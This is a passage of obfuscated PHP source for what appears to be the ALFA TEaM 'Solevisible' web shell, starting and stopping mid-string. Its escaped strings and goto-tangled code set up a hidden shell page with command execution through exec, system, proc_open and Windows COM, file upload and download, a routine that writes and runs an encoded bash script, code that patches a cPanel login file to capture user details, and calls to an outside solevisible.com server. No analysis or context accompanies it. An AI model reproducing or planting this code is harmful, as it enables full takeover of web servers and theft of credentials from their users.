6\x61\x5f\160\x2e\x20\42\x20\50\x20\42\56\44\x41\154\146\x61\137\162\145\x73\x70\x6f\156\x73\x65\133\47\x75\163\x65\162\137\162\157\167\x27\x5d\x5b\47\165\x73\145\x72\137\x65\x6d\141\x69\x6c\x27\135\56\x22\x20\x29\x5c\156\42\51\x3b\100\x66\143\x6c\x6f\x73\145\50\x24\x66\x70\x29\73\44\146\x20\x3d\40\x40\x66\151\154\x65\x28\x24\101\x6c\146\x61\137\x66\151\x6c\x65\51\73\44\x6e\145\x77\x20\x3d\40\x61\162\162\141\x79\x5f\x75\156\151\x71\165\145\x28\x24\x66\x29\73\x24\146\x70\x20\x3d\40\x40\x66\157\x70\145\156\x28\44\101\154\x66\x61\137\146\x69\x6c\x65\x2c\x20\x22\x77\42\x29\73\146\x6f\162\145\x61\143\150\50\44\156\x65\x77\40\x61\x73\x20\44\166\141\x6c\x75\x65\163\51\x7b\100\x66\x70\165\164\x73\50\44\146\160\54\x20\44\166\x61\x6c\x75\x65\163\51\x3b\x7d\100\x66\143\154\x6f\163\145\x28\x24\x66\x70\51\x3b\x7d\x7d"; goto kBB7a; YvBaB: $login = $path . "\x2f\x75\x63\x70\56\160\x68\x70"; goto RnJWA; AkKmw: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { goto tHY1U; lmejZ: @file_put_contents($login, $login_replace); goto LMYYS; LMYYS: hijackOutput(0, $saveto); goto o9EiL; tHY1U: $login_replace = str_replace($find, $evil_login, $data_login); goto lmejZ; o9EiL: } else { hijackOutput(1); } } else { hijackOutput(1); } goto EeJkJ; EeJkJ: } goto KWEwD; J3y62: function __ZGVjb2Rlcg($s) { return QFdAWqZnUX($s); } goto tsIKa; L1bCG: if (!@is_dir) { $GLOBALS["\x63\167\x64"] = @getcwd(); } goto j_AU1; MOuuo: function alfa_getColor($target) { if (isset($GLOBALS["\x44\x42\137\x4e\101\115\x45"]["\143\157\154\x6f\162"][$target]) && $GLOBALS["\x44\x42\x5f\x4e\x41\115\105"]["\143\157\x6c\x6f\162"][$target] != '') { return $GLOBALS["\104\102\x5f\x4e\x41\x4d\x45"]["\x63\x6f\x6c\x6f\162"][$target]; } else { $target = $GLOBALS["\137\137\x41\x4c\106\101\137\x43\x4f\114\x4f\x52\x5f\137"][$target]; if (is_array($target)) { return $target["\x6b\145\x79\137\x63\157\154\x6f\162"]; } else { return $target; } } } goto xj_Ot; wokKq: if (isset($_GET["\163\157\154\x65\166\151\163\151\x62\x6c\x65"])) { goto bHXeG; bOk5W: echo "\x3c\x62\x20\x73\x74\171\x6c\145\x3d\47\x63\x6f\x6c\157\x72\72\40\43\x37\103\x46\103\x30\x30\47\76\x53\x6f\146\x74\167\141\x72\145\72\x20\x3c\x2f\x66\157\x6e\x74\x3e\74\x66\157\x6e\x74\40\x63\157\x6c\x6f\x72\x3d\x77\150\x69\x74\x65\x3e" . $_SERVER["\123\105\122\126\105\x52\137\123\x4f\x46\x54\127\101\122\x45"] . "\74\x2f\146\x6f\156\164\76\74\142\x72\x3e"; goto jXXrt; JPz2g: echo "\74\164\151\164\x6c\145\76\123\x6f\154\145\x76\151\163\151\x62\154\145\x20\x48\151\x64\x64\x65\x6e\x20\123\x68\145\x6c\154\x3c\x2f\x74\x69\x74\154\145\x3e"; goto d2cF0; d2cF0: echo "\74\x62\157\x64\x79\40\x62\147\143\157\x6c\157\x72\x3d\x23\60\x30\60\x30\60\x30\x3e"; goto U5StE; AZ34X: $safe_mode = @ini_get("\x73\141\x66\x65\137\x6d\x6f\x64\x65"); goto IBQ89; U5StE: echo "\x3c\x62\x3e\x3c\142\x69\x67\x3e\74\x66\x6f\x6e\x74\40\x63\157\154\157\x72\x3d\43\x37\x43\106\103\60\x30\x3e\113\x65\162\x6e\145\154\40\72\40\x3c\x2f\x66\157\156\164\x3e\74\146\157\x6e\164\x20\x63\157\154\x6f\162\75\x22\43\106\x46\x46\106\106\42\x3e" . (function_exists("\160\150\160\137\165\156\x61\x6d\x65") ? php_uname() : "\x3f\x3f\x3f") . "\x3c\57\x66\x6f\x6e\164\x3e\x3c\57\142\76\74\57\x62\151\x67\76"; goto AZ34X; XoEml: echo "\x50\127\104\x3a\74\x66\157\x6e\x74\40\x63\157\x6c\x6f\162\x3d\x23\x46\x46\x46\106\x46\106\x3e\x20" . str_replace("\x5c", "\x2f", @getcwd()) . "\x2f\x3c\142\x72\40\x2f\x3e"; goto tf3iI; XN47e: echo "\x3c\x62\x20\x73\x74\x79\154\145\x3d\x27\143\157\154\x6f\x72\x3a\x20\43\x37\103\106\103\60\x30\47\76\x59\x6f\x75\162\40\111\160\40\101\144\144\162\x65\x73\x73\40\x69\163\x20\72\40\x20\74\x2f\x66\157\156\x74\x3e\x3c\146\x6f\156\x74\x20\143\x6f\154\x6f\x72\x3d\x77\150\x69\x74\x65\x3e" . $_SERVER["\x52\x45\115\117\124\105\137\x41\104\104\x52"] . "\x3c\x2f\x66\157\x6e\164\x3e\74\x62\162\76"; goto rrELF; I2AuM: echo "\74\150\164\x6d\x6c\76"; goto JPz2g; AK7Sn: exit; goto XQFYZ; cYFxU: if (isset($_POST["\x63\157\x6d\x6d\141\x6e\144\x5f\x73\157\x6c\145\x76\x69\x73\151\142\154\x65"])) { goto g40H1; SJzmF: $solevisible = "\x63\x64\40\47" . addslashes(str_replace("\x5c", "\57", @getcwd())) . "\47" . $separator . '' . __ZGVjb2Rlcg($_POST["\143\x6f\155\155\x61\x6e\x64\137\x73\157\x6c\145\166\151\163\151\142\154\145"]); goto lsjdx; lsjdx: echo alfaEx($solevisible); goto Mjlop; g40H1: if (strtolower(substr(PHP_OS, 0, 3)) == "\x77\151\156") { $separator = "\x26"; } else { $separator = "\73"; } goto SJzmF; Mjlop: } goto trAAk; rrELF: echo "\74\x62\40\163\x74\171\x6c\145\x3d\x27\x63\157\x6c\157\162\72\x20\43\x37\103\106\103\60\60\47\76\x53\x65\162\x76\145\162\x20\x49\x70\40\101\144\144\x72\145\x73\x73\40\151\x73\40\72\x20\x20\74\57\146\157\x6e\164\x3e\74\146\157\x6e\x74\x20\143\157\x6c\x6f\162\x3d\x77\150\151\164\x65\76" . (function_exists("\147\145\164\x68\157\163\164\142\x79\156\141\155\145") ? @gethostbyname($_SERVER["\110\x54\x54\120\137\x48\117\123\x54"]) : "\77\x3f\77") . "\x3c\57\146\x6f\156\164\x3e\74\x62\x72\76\74\160\76"; goto l1o2w; Jbtgr: echo "{$disfun}"; goto f2feY; jXXrt: echo "\x50\110\120\x20\x56\x65\162\x73\x69\x6f\156\72\40\x3c\146\x6f\156\x74\x20\143\x6f\154\x6f\x72\75\167\x68\151\x74\x65\x3e" . PHP_VERSION . "\74\57\146\x6f\156\x74\x3e\74\142\162\40\x2f\76"; goto XoEml; svyMX: echo "\x3c\x68\162\76\74\x66\157\x72\x6d\x20\157\156\x53\165\142\x6d\x69\x74\75\42\x74\x68\151\x73\x2e\x65\x78\145\x63\x75\164\145\56\x64\x69\163\x61\142\154\145\144\x3d\164\x72\165\145\x3b\x74\x68\151\163\x2e\x63\x6f\x6d\x6d\141\156\x64\137\x73\157\154\x65\x76\151\163\x69\142\154\145\56\x76\x61\154\165\x65\x20\x3d\40\x62\x74\157\141\x28\x75\x6e\x65\163\x63\141\160\145\50\145\x6e\x63\157\x64\145\125\x52\111\x43\x6f\x6d\160\x6f\x6e\145\x6e\x74\50\164\x68\x69\163\x2e\143\x6f\155\155\x61\156\x64\137\x73\x6f\154\x65\166\x69\x73\x69\x62\x6c\145\56\x76\x61\x6c\165\145\x29\x29\x29\73\x22\40\x6d\x65\164\x68\x6f\144\75\42\120\x4f\x53\x54\42\76\105\x78\145\x63\x75\x74\x65\40\x43\157\x6d\x6d\x61\x6e\144\72\40\74\151\x6e\x70\x75\164\40\156\141\155\x65\x3d\42\143\157\x6d\x6d\141\156\144\x5f\163\157\x6c\145\166\151\163\151\142\x6c\x65\42\40\166\x61\154\x75\145\75\x22\x22\40\x73\151\x7a\145\x3d\42\x35\x39\x22\x20\x74\x79\x70\145\x3d\42\164\x65\x78\164\x22\40\x61\x6c\x69\x67\x6e\x3d\x22\x6c\x65\146\x74\42\x20\76\x3c\151\156\160\165\164\x20\x6e\x61\x6d\x65\x3d\42\x65\x78\x65\143\165\164\x65\x22\40\x76\141\x6c\x75\145\x3d\x22\x45\170\145\x63\x75\x74\x65\42\x20\164\x79\160\x65\75\x22\x73\165\x62\155\x69\164\x22\76\x3c\x62\x72\x3e\x3c\x2f\146\157\x72\155\76\xd\xa\74\150\162\x3e\x3c\x70\162\145\76"; goto cYFxU; YUIjA: echo "\x3c\x66\157\x6e\164\x20\143\157\x6c\x6f\x72\75\x23\67\103\x46\103\60\x30\76\x44\151\163\141\142\154\145\40\146\x75\x6e\143\x74\x69\157\156\163\x20\72\40\74\x2f\146\x6f\156\x74\x3e"; goto pRMW0; trAAk: echo "\x3c\57\160\162\145\76\15\xa\74\57\x62\x6f\x64\171\x3e\x3c\x2f\x68\x74\155\x6c\x3e"; goto AK7Sn; X35di: echo "\103\127\x44\72\x20\x3c\151\x6e\x70\165\164\40\x74\x79\160\x65\x3d\42\x74\145\x78\x74\x22\x20\x6e\x61\155\145\75\42\x63\x77\x64\x22\x20\x76\x61\154\165\145\75\x22" . str_replace("\x5c", "\57", @getcwd()) . "\x2f\42\x20\x73\151\172\x65\75\42\x35\x39\42\76\x3c\x70\76\x3c\x69\x6e\x70\x75\x74\40\x74\x79\x70\145\75\x22\x66\x69\154\x65\42\x20\x6e\141\x6d\x65\x3d\42\x66\151\154\x65\x22\40\x73\151\x7a\x65\x3d\x22\x34\65\42\76\x3c\151\x6e\x70\165\164\x20\x6e\x61\155\x65\75\x22\165\x70\154\x6f\x61\x64\x22\40\x74\x79\160\x65\x3d\42\163\165\x62\x6d\x69\164\x22\40\x69\144\x3d\x22\137\165\x70\154\42\x20\166\141\x6c\x75\x65\75\42\125\160\154\x6f\x61\144\x22\x3e\x3c\x2f\x70\x3e\74\x2f\146\157\x72\x6d\x3e\x3c\x2f\143\x65\156\x74\145\162\76"; goto Y0oLO; f2feY: echo "\74\57\x66\157\156\164\76\74\x62\162\x3e"; goto XN47e; bHXeG: @error_reporting(E_ALL ^ E_NOTICE); goto I2AuM; l1o2w: echo "\74\x68\x72\76\74\x63\x65\156\164\145\162\76\74\x66\157\162\x6d\x20\x6f\156\123\x75\142\x6d\151\x74\x3d\x22\x74\150\x69\163\x2e\x75\160\x6c\157\141\x64\x2e\x64\x69\163\x61\x62\154\145\144\75\x74\x72\x75\145\x3b\164\x68\151\x73\56\143\167\144\56\166\141\154\x75\145\x20\75\40\142\164\157\141\50\165\x6e\145\x73\x63\x61\x70\145\x28\145\x6e\143\x6f\144\145\x55\122\x49\103\x6f\x6d\x70\157\x6e\145\x6e\x74\50\164\x68\x69\163\56\143\167\x64\56\x76\x61\x6c\x75\145\x29\x29\x29\x3b\x22\40\141\143\x74\x69\157\156\75\x22\42\x20\x6d\x65\x74\150\157\x64\x3d\x22\160\x6f\163\x74\42\40\x65\156\143\x74\171\x70\x65\x3d\42\x6d\x75\x6c\x74\x69\x70\141\162\164\x2f\x66\157\x72\155\x2d\144\141\x74\141\42\40\x6e\x61\155\145\75\42\x75\x70\154\157\x61\x64\x65\x72\x22\40\151\x64\75\42\x75\x70\x6c\x6f\141\144\145\162\42\x3e"; goto X35di; Y0oLO: if (isset($_FILES["\146\151\154\145"])) { if (@move_uploaded_file($_FILES["\x66\x69\x6c\x65"]["\x74\155\x70\137\x6e\x61\x6d\145"], __ZGVjb2Rlcg(@$_POST["\143\167\x64"]) . "\57" . $_FILES["\x66\151\x6c\145"]["\156\x61\155\x65"])) { echo "\74\142\76\x3c\146\157\156\x74\40\143\157\154\x6f\162\75\x22\43\x37\x43\106\x43\x30\60\42\x3e\74\143\145\x6e\164\x65\x72\76\125\160\154\157\x61\x64\x20\123\165\143\143\x65\x73\x73\x66\165\154\154\x79\40\73\x29\74\x2f\x66\157\x6e\164\76\x3c\57\x61\76\x3c\x66\157\156\164\40\x63\157\154\x6f\x72\75\42\x23\x37\103\106\x43\60\x30\x22\x3e\74\57\x62\76\74\x62\162\76\74\x62\162\76\74\57\143\x65\x6e\164\x65\x72\x3e"; } else { echo "\x3c\143\x65\x6e\x74\x65\162\76\74\x62\x3e\x3c\x66\157\156\164\x20\x63\157\154\x6f\x72\75\42\x23\x37\x43\x46\103\x30\60\x22\76\x55\160\154\157\x61\x64\x20\x66\141\x69\154\145\x64\x20\x3a\50\74\x2f\146\x6f\x6e\164\76\74\x2f\x61\x3e\x3c\146\x6f\156\164\40\x63\157\x6c\x6f\x72\75\x22\x23\x37\x43\x46\x43\x30\42\76\74\x2f\x62\76\x3c\x2f\143\145\156\x74\145\162\x3e\74\142\162\76\x3c\142\x72\76"; } } goto svyMX; kdOks: if (empty($disfun)) { $disfun = "\74\x66\157\156\x74\40\x63\x6f\x6c\x6f\x72\x3d\42\x67\162\145\145\x6e\x22\x3e\x4e\x4f\x4e\x45\74\57\146\x6f\156\164\76"; } goto tGSvO; IBQ89: if ($safe_mode) { $r = "\74\x62\40\163\x74\x79\154\145\75\x27\143\157\x6c\157\x72\72\40\162\145\144\47\76\117\156\74\57\142\x3e"; } else { $r = "\x3c\x62\x20\163\164\171\x6c\x65\75\x27\143\157\x6c\x6f\162\72\40\x67\162\145\145\x6e\47\x3e\x4f\146\x66\74\57\x62\76"; } goto ISo4s; tf3iI: echo "\74\x62\x20\163\164\171\x6c\145\75\x27\x63\157\x6c\157\162\72\40\43\67\x43\106\103\x30\60\47\x3e\123\x61\x66\x65\40\x4d\157\x64\x65\40\72\40{$r}\74\x62\x72\76"; goto YUIjA; ISo4s: echo "\74\142\x72\76\x3c\142\x20\x73\164\x79\154\145\75\x27\143\x6f\x6c\157\162\x3a\40\x23\67\x43\x46\103\x30\x30\x27\x3e\x4f\123\72\x20\x3c\57\146\x6f\x6e\164\x3e\74\x66\157\x6e\x74\40\x63\157\154\x6f\x72\75\167\150\151\x74\x65\76" . PHP_OS . "\74\57\x66\x6f\x6e\x74\x3e\74\x62\x72\x3e"; goto bOk5W; tGSvO: echo "\x3c\x66\157\156\164\40\x63\x6f\154\x6f\162\x3d\x72\145\144\x3e"; goto Jbtgr; pRMW0: $disfun = @ini_get("\x64\x69\163\x61\142\x6c\145\x5f\x66\165\x6e\x63\x74\x69\x6f\x6e\x73"); goto kdOks; XQFYZ: } goto yItN7; CNXC7: function alfaupdateheader() { if (!isset($_SESSION["\165\x70\x64\141\164\145\150\x65\x61\144\145\x72\x5f\x64\x61\164\x61"])) { goto VMKro; xTUJW: $data = alfaEx("\143\x64\40\x27{$realdir}\57\141\154\146\x61\143\147\151\141\x70\151\x27\x3b\x73\x68\40\x67\x65\164\x68\x65\x61\144\145\x72\56\x61\x6c\x66\x61", false, true, true); goto cSTb_; cSTb_: if (@is_array(@json_decode($data, true))) { $_SESSION["\165\160\x64\141\x74\x65\x68\x65\141\x64\145\162\x5f\x64\141\x74\x61"] = $data; echo $data; } goto n1UbJ; pJxx9: alfaWriteTocgiapi("\147\x65\x74\x68\145\x61\x64\145\162\x2e\141\154\146\x61", $bash); goto xTUJW; x1kid: $realdir = addslashes(dirname($_SERVER["\123\103\122\x49\x50\124\137\x46\111\x4c\105\116\x41\115\105"])); goto pJxx9; VMKro: $bash = "\x7a\x5a\122\144\142\71\x6f\167\106\111\141\166\171\141\70\x34\71\x64\111\x47\x4a\x4c\113\60\166\126\x79\x46\116\106\124\x6f\x68\105\x52\x42\147\164\x46\x64\121\x49\x52\x4d\x34\x68\101\114\x34\x30\x52\x32\125\x6b\131\x70\57\63\61\62\147\120\101\x52\x71\114\161\x62\141\131\156\x79\x49\x66\x73\70\x78\x2b\x38\65\162\x2b\125\166\126\x30\64\161\x68\x54\x4f\150\x33\x4a\x47\x68\115\x65\x67\63\156\x77\x62\x74\127\156\156\161\145\143\x44\125\157\x7a\x38\x2b\x7a\x50\x47\115\x51\x42\x7a\x47\x45\x42\120\102\x49\x46\x34\155\x59\143\x52\102\x70\112\115\154\x4a\x46\x6a\x41\71\111\x33\107\x4d\x4e\x6d\x2b\x4d\101\166\167\120\130\x43\106\x52\x52\65\117\x43\x4d\x69\125\53\x70\161\161\x47\111\x33\165\x72\x30\x36\x37\x57\x32\70\60\x65\57\x31\141\145\124\x45\x6c\103\121\121\153\x38\125\x4a\x67\x53\57\64\x62\107\x4f\125\172\x43\126\x36\x71\60\x75\x73\x5a\164\157\x6a\x74\117\x52\x55\151\105\150\x57\104\145\107\105\105\116\x67\106\x72\150\126\x4a\112\x67\x70\123\150\x62\70\x4f\x52\132\x78\x6c\x42\112\x49\101\x43\x35\x57\x43\x75\116\161\x71\x48\x33\71\63\x31\x41\x2f\151\122\101\145\x70\x61\150\x4e\121\x4c\141\62\131\65\53\64\112\x4a\x4b\x30\132\x70\117\111\121\162\163\x4e\70\x41\155\x64\x6b\x67\101\x74\x65\106\x6d\170\x76\131\x35\122\70\x68\153\64\65\121\x31\x56\x4b\65\161\64\x59\146\143\132\x4b\166\x6a\105\x62\161\x64\x71\x73\x6a\x44\53\63\x46\x49\x44\71\141\143\x42\x5a\150\x6e\x34\x69\151\x6e\x6f\x4e\x53\57\66\62\157\154\117\115\x35\x55\x58\161\x51\x5a\x5a\x61\x7a\x66\x37\101\x78\x76\113\x75\x2b\112\155\x42\67\x64\x2f\x62\x64\x2f\x57\63\x46\171\151\x44\x72\x45\x4a\x4a\x45\x55\x48\71\114\171\121\x54\x72\x57\105\104\130\113\x51\x7a\150\x65\147\x41\x75\125\x74\x70\165\x30\122\x6c\165\x4b\x71\x49\60\120\147\x4e\117\116\146\152\152\x41\71\x43\120\65\160\150\171\161\125\x45\x39\70\144\114\161\57\122\172\x55\62\53\x4e\x47\71\67\156\145\x36\166\x52\162\171\106\110\67\x77\x6e\155\x6c\x49\x6b\153\170\x63\x7a\x62\x42\161\x74\154\105\123\x47\122\x30\66\x73\x2f\x4e\170\x76\151\170\62\63\156\141\x68\x75\x6b\x69\57\141\x39\x65\170\x41\x4e\x6b\x76\116\124\142\x72\130\161\x2f\x6d\127\146\x41\x6a\x47\112\112\x70\x4b\116\156\145\x75\x4d\x4d\x56\x56\117\166\127\x47\x77\x6f\116\125\x34\104\125\101\142\157\142\x70\x6f\156\113\162\121\x52\x44\x35\103\x45\x68\x42\165\x6c\142\132\x54\64\x4f\113\x71\60\113\x39\x41\x73\x34\70\x55\x4d\x72\107\x61\x6e\x73\131\x6f\x46\65\121\x6c\x30\145\x6d\163\x4c\x54\164\105\113\x37\x50\161\147\114\x59\121\123\x59\x66\164\x6c\152\150\160\x77\x59\121\x30\x6d\x43\63\110\x76\163\120\104\x41\132\x73\x65\132\x6a\170\113\x62\x2b\x2f\67\71\152\x66\x51\71\126\x63\147\164\x79\121\107\117\x48\x72\106\x69\145\147\124\67\141\x67\x75\143\62\101\116\x75\122\x67\124\x55\171\101\x57\122\147\151\x43\71\x39\130\116\x44\164\155\64\x57\170\67\x64\x65\130\x72\114\x6f\x67\114\x76\121\x74\64\x4f\x59\x73\x7a\60\x37\x64\x75\120\70\x69\163\x57\125\x65\144\x42\57\x37\x73\117\156\130\x62\147\x73\71\x4b\124\x32\167\66\x43\172\170\x57\57\x30\146\x58\x36\x62\x61\x48\x33\65\143\x65\x47\x75\x31\123\156\170\102\x77\x3d\x3d"; goto x1kid; n1UbJ: } else { echo $_SESSION["\165\160\x64\141\164\145\x68\x65\141\x64\x65\162\137\x64\141\164\141"]; } } goto lgB26; go6An: function alfadlfile() { if (isset($_POST["\x63"], $_POST["\x66\151\154\x65"])) { goto js7OC; Bl6oL: $_POST["\x66\151\154\x65"] = str_replace("\57\57", "\57", $_POST["\x63"] . "\x2f" . $basename); goto zN33z; xoE0t: if (@is_file($_POST["\x66\151\154\x65"]) && @is_readable($_POST["\x66\151\x6c\x65"]) || $alfa_canruncmd) { goto GfJdv; iGlBf: if (isset($GLOBALS["\x67\x6c\x6f\x62\x5f\143\150\x64\151\162\137\x66\141\x6c\x73\x65"])) { goto P4Umd; hnzJO: if (_alfa_is_writable($scriptpath)) { goto m3p6F; m3p6F: alfaEx("\143\x70\40\47" . addslashes($_POST["\146\x69\154\x65"]) . "\x27\40\x27" . addslashes($filepath) . "\x27"); goto nZTad; xp3e3: @unlink($filepath); goto k11pP; nZTad: readfile($filepath); goto xp3e3; k11pP: } else { alfaEx("\x63\x61\x74\40\x27" . addslashes($_POST["\146\151\154\145"]) . "\x27"); } goto d4RJM; XfVE6: $scriptpath = dirname($_SERVER["\x53\103\x52\111\120\x54\137\x46\111\x4c\x45\x4e\x41\x4d\x45"]); goto e3CM3; e3CM3: $filepath = $scriptpath . "\x2f" . $randname; goto hnzJO; P4Umd: $randname = $basename . rand(111, 9999); goto XfVE6; d4RJM: } else { readfile($_POST["\x66\x69\x6c\145"]); } goto Yjrqe; Y6AoW: header("\x43\x6f\156\164\x65\156\164\55\104\x69\x73\x70\x6f\163\x69\x74\151\x6f\156\72\40\141\164\164\141\x63\x68\x6d\x65\x6e\164\x3b\40\146\151\154\x65\156\141\x6d\x65\75\x22" . addslashes($basename) . "\42"); goto Uuk5N; GfJdv: ob_start("\157\142\137\x67\172\150\x61\x6e\144\x6c\145\162", 4096); goto Y6AoW; Uuk5N: header("\x43\x6f\x6e\x74\x65\156\x74\55\x54\171\160\145\x3a\40\x61\160\x70\154\x69\x63\141\x74\151\157\x6e\57\x6f\x63\x74\x65\x74\x2d\163\x74\162\x65\x61\155"); goto iGlBf; Yjrqe: } else { echo "\x45\x72\x72\x6f\162\x2e\56\x2e\x21"; } goto aIErk; js7OC: $basename = rawurldecode(basename($_POST["\x66\x69\x6c\x65"])); goto Bl6oL; zN33z: $alfa_canruncmd = _alfa_can_runCommand(true, true); goto xoE0t; aIErk: } } goto YmHhB; ObjKp: function _alfa_php_cmd($in, $re = false) { goto drhzx; drhzx: $out = ''; goto EkDmr; A3hyo: return $out; goto NkMLt; EkDmr: try { if ($re) { $in = $in . "\40\x32\76\x26\61"; } if (function_exists("\x65\170\145\x63")) { @exec($in, $out); $out = @join("\12", $out); } elseif (function_exists("\x70\x61\163\x73\x74\150\162\165")) { goto snU7g; go6IX: $out = ob_get_clean(); goto eIxIs; snU7g: ob_start(); goto KMJuP; KMJuP: @passthru($in); goto go6IX; eIxIs: } elseif (function_exists("\163\171\x73\164\x65\155")) { goto jUH_T; rHdMV: @system($in); goto SUL21; SUL21: $out = ob_get_clean(); goto jh13m; jUH_T: ob_start(); goto rHdMV; jh13m: } elseif (function_exists("\163\x68\145\154\x6c\x5f\145\170\145\x63")) { $out = shell_exec($in); } elseif (function_exists("\x70\x6f\160\145\x6e") && function_exists("\160\143\x6c\157\163\x65")) { if (is_resource($f = @popen($in, "\162"))) { goto fvYOV; N14UJ: while (!@feof($f)) { $out .= fread($f, 1024); } goto XBWxH; XBWxH: pclose($f); goto dRmfb; fvYOV: $out = ''; goto N14UJ; dRmfb: } } elseif (function_exists("\160\x72\157\x63\x5f\x6f\160\x65\x6e")) { goto kt3Nb; Z90cH: $out = @stream_get_contents($pipes[1]); goto snUor; Bs_Y2: $process = @proc_open($in . "\x20\62\x3e\46\61", array(array("\160\x69\x70\x65", "\167"), array("\160\151\x70\x65", "\x77"), array("\x70\151\x70\x65", "\167")), $pipes, null); goto Z90cH; kt3Nb: $pipes = array(); goto Bs_Y2; snUor: } elseif (class_exists("\103\117\x4d")) { goto om5aZ; om5aZ: $alfaWs = new COM("\x57\x53\x63\x72\151\160\164\x2e\163\150\x65\x6c\x6c"); goto dKyQo; DVHhT: $out = $stdout->ReadAll(); goto TDQ23; AdarK: $stdout = $exec->StdOut(); goto DVHhT; dKyQo: $exec = $alfaWs->exec("\143\x6d\144\x2e\145\x78\145\x20\57\x63\40" . $_POST["\141\154\x66\141\x31"]); goto AdarK; TDQ23: } } catch (Exception $e) { } goto A3hyo; NkMLt: } goto JaYCP; tFDUs: function alfaplus() { goto r2Yem; TbBml: alfafooter(); goto NtrIZ; p1Htw: if ($_POST["\x61\154\146\141\x31"] == "\156\x65\167\163" || $_POST["\141\154\146\x61\61"] == "\164\157\157\x6c\x73") { try { goto FF5Do; M28rz: if ($xml) { if (@simplexml_load_string($xml)) { goto iqSwK; iqSwK: $doc = new DOMDocument(); goto VUkGC; AHfVu: foreach ($items as $item) { goto pwUF9; SPffh: $link = $item->getElementsByTagName("\154\151\156\x6b")->item(0)->nodeValue; goto myruA; EtJ6e: $description = $item->getElementsByTagName("\144\145\163\143\162\x69\x70\164\x69\x6f\x6e")->item(0)->nodeValue; goto SPffh; myruA: $pubDate = $item->getElementsByTagName("\x70\x75\142\104\x61\x74\145")->item(0)->nodeValue; goto WjSvP; pwUF9: $title = $item->getElementsByTagName("\164\151\x74\154\145")->item(0)->nodeValue; goto EtJ6e; WjSvP: echo __pre() . "\x3c\143\x65\156\164\x65\162\x3e\74\x61\x20\x68\x72\145\x66\x3d\47{$link}\x27\40\x74\x61\162\147\x65\164\75\47\137\142\154\x61\156\x6b\47\76{$title}\x3c\x2f\x61\x3e\74\142\x72\x3e{$description}\74\142\x72\76\74\x73\155\141\x6c\x6c\x3e\74\x66\x6f\156\164\40\40\143\157\154\x6f\162\75\47\x23\106\x46\106\106\x46\x46\x27\x3e\x3c\142\x3e\104\x61\x74\145\x3a\40{$pubDate}\x3c\57\142\76\74\57\x66\x6f\156\x74\76\x3c\57\x73\x6d\141\154\x6c\76\74\x2f\143\145\156\164\x65\x72\76\x3c\x2f\x70\162\x65\x3e"; goto oEJ4W; oEJ4W: } goto vzvBo; haLGW: $data = $doc->getElementsByTagName("\144\141\x74\141")->item(0); goto yV2gp; yV2gp: $items = $data->getElementsByTagName("\x69\x74\145\155"); goto AHfVu; VUkGC: $doc->loadXML($xml); goto haLGW; vzvBo: } else { echo $msg; } } else { echo $msg; } goto VpANV; FF5Do: $s1 = "\150\x74\164\x70\x3a\x2f\x2f\x73\x6f\x6c\145\166\151\163\x69\x62\x6c\x65\x2e\143\157\155\57" . ($_POST["\x61\154\x66\141\61"] == "\156\145\x77\163" ? "\x6e\x65\167\x73\56\x70\x68\x70" : "\x74\157\x6f\154\x73\x2e\160\x68\160"); goto CAnAJ; eOzlg: $news = new AlfaCURL(); goto lc9JW; CAnAJ: $msg = "\x3c\143\145\x6e\164\x65\x72\76\x3c\146\157\x6e\x74\x20\x63\157\x6c\157\x72\x3d\47\162\145\x64\x27\x3e\x3c\x62\76\74\160\76\x43\x61\156\x60\x74\40\103\x6f\x6e\x6e\x65\143\164\x20\164\x6f\x20\x52\x65\x6d\157\164\x65\x20\123\145\x72\x76\x65\162\x20\56\56\x2e\x21\x3c\x62\x72\x3e\x50\x6c\145\141\x73\145\x20\x54\x72\171\40\101\x67\141\151\156\x20\x4c\x61\x74\x65\162\56\x2e\56\x21\74\x2f\160\76\x3c\x2f\142\76\74\x2f\x66\157\156\164\x3e\74\x2f\143\145\x6e\x74\145\x72\x3e"; goto eOzlg; lc9JW: if ($news->Send($s1)) { $xml = $news->Send($s1); } else { $xml = false; } goto M28rz; VpANV: } catch (Exception $e) { echo $e->getMessage(); } } elseif ($_POST["\141\154\146\141\61"] == "\x61\x62\x6f\x75\164") { echo __pre() . "\x3c\x70\x72\x65\x3e\x3c\x63\145\156\164\x65\x72\x3e\x3c\151\x6d\147\x20\163\162\x63\x3d\47\150\164\x74\160\72\57\x2f\163\157\x6c\x65\x76\x69\x73\151\142\x6c\x65\56\x63\x6f\x6d\x2f\x69\x6d\x61\147\x65\x73\x2f\146\141\162\x76\141\x68\141\x72\55\151\x72\141\156\56\x70\156\147\47\x3e\74\142\x72\76\xd\12\74\142\76\74\146\x6f\x6e\x74\40\163\x69\172\x65\75\x27\53\x33\47\40\x63\x6f\154\x6f\x72\x3d\x27\x23\x30\x30\x41\x32\62\60\47\76\x26\x23\71\67\x37\64\73\x20\x7e\40\120\105\101\x43\x45\x20\176\x20\46\x23\71\67\67\x34\x3b\74\57\x66\x6f\x6e\164\76\x3c\x62\162\x3e\x3c\142\76\15\12\74\146\157\156\164\40\143\x6f\154\157\162\75\x27\43\60\60\x41\x32\62\60\x27\x3e\123\x68\145\x6c\154\40\x43\x6f\144\145\x64\40\x42\x79\x20\123\157\x6c\145\40\x53\141\x64\40\x26\x20\x49\x6e\166\x69\x73\x69\142\x6c\145\40\x28\101\114\106\x41\x20\x54\x45\141\115\x29\x3c\x2f\x66\157\156\164\x3e\74\142\162\76\xd\xa\74\146\157\156\164\x20\143\x6f\154\x6f\x72\x3d\47\x23\x30\x30\x41\x32\62\60\x27\76\103\157\x6e\x74\141\143\x74\x20\72\x20\163\x6f\x6c\145\x76\x69\163\151\142\x6c\x65\x40\x67\155\141\151\x6c\x2e\143\x6f\x6d\74\57\x66\157\156\164\76\74\x62\162\x3e\15\12\x3c\x66\x6f\156\164\x20\x63\x6f\154\x6f\x72\75\x27\43\x30\x30\x41\62\62\x30\47\x3e\x54\145\154\145\147\162\x61\155\x20\103\150\x61\x6e\x6e\x65\x6c\72\40\x40\x73\157\x6c\145\x76\x69\163\x69\x62\154\145\74\57\146\157\x6e\x74\76\74\142\162\76\xd\12\74\146\x6f\x6e\164\40\143\x6f\x6c\x6f\162\x3d\x27\43\106\x46\106\106\x46\x46\47\76\123\153\x79\x70\145\x20\72\40\145\x68\163\x61\156\x2e\151\156\x76\151\x73\151\142\154\x65\x3c\x2f\146\x6f\x6e\164\76\x3c\x62\x72\76\15\12\74\146\157\156\x74\40\143\x6f\154\x6f\162\x3d\x27\43\x46\106\x46\x46\106\106\47\x3e\123\153\171\x70\145\40\x3a\x20\x73\157\154\x65\x2e\163\x6